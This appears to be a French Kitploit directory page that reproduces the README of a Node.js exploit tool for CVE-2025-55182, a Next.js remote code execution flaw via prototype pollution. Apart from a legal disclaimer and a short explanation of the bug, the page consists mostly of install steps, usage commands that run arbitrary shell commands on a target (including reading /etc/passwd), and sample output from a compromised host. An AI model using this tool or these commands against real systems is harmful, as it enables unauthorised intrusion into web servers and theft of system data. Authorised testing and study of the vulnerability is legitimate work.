Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2025-55182-node — CVE-2025-55182 Next.js RCE Exploit Tool | Kitploit
Outils/GitHubGitHub/racall/cve-2025-55182-node
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubracall/cve-2025-55182-node

cve-2025-55182-node

CVE-2025-55182 Next.js RCE Exploit Tool

Voir le dépôt
1il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-55182 Outil d'exploitation RCE Next.js

中文文档 | 漏洞原理分析


[!CAUTION]

⚠️ AVERTISSEMENT - LIRE AVANT UTILISATION

Cet outil est destiné UNIQUEMENT à :

  • Chercheurs en sécurité effectuant une vérification de vulnérabilité
  • Tests de pénétration autorisés avec permission explicite
  • Fins éducatives et d'apprentissage

L'accès non autorisé à des systèmes informatiques est ILLEGAL.

En utilisant cet outil, vous acceptez que :

  1. Vous ayez obtenu une autorisation appropriée avant de tester tout système
  2. Vous n'utiliserez pas cet outil à des fins malveillantes
  3. Vous êtes seul responsable de vos actions et de leurs conséquences

L'auteur décline toute responsabilité en cas d'utilisation abusive de cet outil.


Un outil d'exploitation d'exécution de code à distance (RCE) pour la vulnérabilité de pollution de prototype côté serveur de Next.js.

Aperçu de la vulnérabilité

CVE-2025-55182 est une vulnérabilité de sécurité critique affectant Next.js qui permet à des attaquants d'exécuter du code à distance via des requêtes conçues exploitant la pollution de prototype.

📖 Pour une analyse technique détaillée, voir EXPLOIT.md

Versions affectées

  • Versions spécifiques de Next.js (se référer à l'avis de sécurité officiel)

Fonctionnement

Cette vulnérabilité exploite le mécanisme de gestion des requêtes Server Actions de Next.js, réalisant une exécution de code arbitraire via la pollution de la chaîne de prototypes __proto__ combinée au constructeur Function.

Installation

root@kitploit:~
# Using yarn
yarn install

# Using npm
npm install

Utilisation

Exécution directe

root@kitploit:~
# Basic usage
node index.js <target_url> [command]

# Examples
node index.js http://localhost:3000
node index.js http://localhost:3000 "ls -la"
node index.js http://localhost:3000 "cat /etc/passwd"

Utilisation des scripts yarn

root@kitploit:~
# Run the tool
yarn start http://localhost:3000 "whoami"

# Or use alias
yarn exploit http://localhost:3000 "ls -la"

# Show help
yarn help

Installation CLI globale

root@kitploit:~
# Link globally
yarn link
# or
npm link

# Then use the command directly
cve-2025-55182 http://localhost:3000
cve-2025-55182 http://localhost:3000 "whoami"

# Unlink
yarn unlink

Options CLI

root@kitploit:~
Utilisation :
  cve-2025-55182 <url> [command]

Arguments :
  url       URL cible (obligatoire)
  command   Commande à exécuter (par défaut : whoami)

Options :
  -h, --help     Afficher le message d'aide
  -v, --version  Afficher le numéro de version

Format de sortie

L'outil produit des résultats au format JSON :

Exécution réussie

root@kitploit:~
{
  "success": true,
  "message": "",
  "data": "command execution result"
}

Échec de l'exécution

root@kitploit:~
{
  "success": false,
  "message": "error message",
  "data": null
}

Exemple

root@kitploit:~
$ cve-2025-55182 http://vulnerable-site.com "id"
{
  "success": true,
  "message": "",
  "data": "uid=1000(www-data) gid=1000(www-data) groups=1000(www-data)"
}

Dépendances

  • axios - Client HTTP
  • form-data - Constructeur FormData

Références

  • Voir les scripts Python
Télécharger l’outil